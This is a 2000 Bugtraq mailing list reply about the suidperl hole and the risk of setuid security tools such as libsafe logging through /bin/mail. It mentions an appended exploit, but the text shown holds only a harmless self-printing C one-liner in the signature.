[16118] in bugtraq
re, suidperl; more
daemon@ATHENA.MIT.EDU (Sebastian)
Mon Aug 7 15:18:35 2000
Message-Id: <Pine.LNX.3.96.1000807180351.8179A-200000@ati02.cs.uni-potsdam.de>
Date: Mon, 7 Aug 2000 18:07:57 +0200
Reply-To: Sebastian <krahmer@CS.UNI-POTSDAM.DE>
From: Sebastian <krahmer@CS.UNI-POTSDAM.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
Yes, I hoped to announce this bug to the perl developers before
it came public; but I think they read BQ ... Michal ... :)
So far, there are more security-related apps which use /bin/mail
for logging (once I had also fallen into thinking that it can be secure,
until Dave Dittrich pointed out that my IDS might be vulnerable), such as
libsafe. Libsafe claims to be a secure strcpy() replacement. It uses
/bin/mail to report buffer overflow attempts with user-supplied data,
if I remember correctly. The libsafe developers were notified
months before by me. I don't know if they fixed it yet.
Maybe the danger is visible after the perl exploit is out.
After all, it showed up again that there is no reason to be "too tricky"
in +s programs. syslog() would have done its task nicely, I think.
regards,
Sebastian
P.S.: Just to make this thing complete, I appended my version of the
exploit, which is based on Michal's but doesn't require usleep nor
a second setuid root program. Should work on BSD too. However, only
tested on Linux.
-=[ cc -Dw=write x.c -- 172 bytes, 1 line ]=-
char s[]="char s[]=;main(){w(1,s,9);*s=34;w(1,s,1);*s=99;w(1,s,85);*s=34;w(1,s,1);w(1,s+9,76);}";main(){w(1,s,9);*s=34;w(1,s,1);*s=99;w(1,s,85);*s=34;w(1,s,1);w(1,s+9,76);}
-=[ http://www.cs.uni-potsdam.de/homepages/students/linuxer ]=-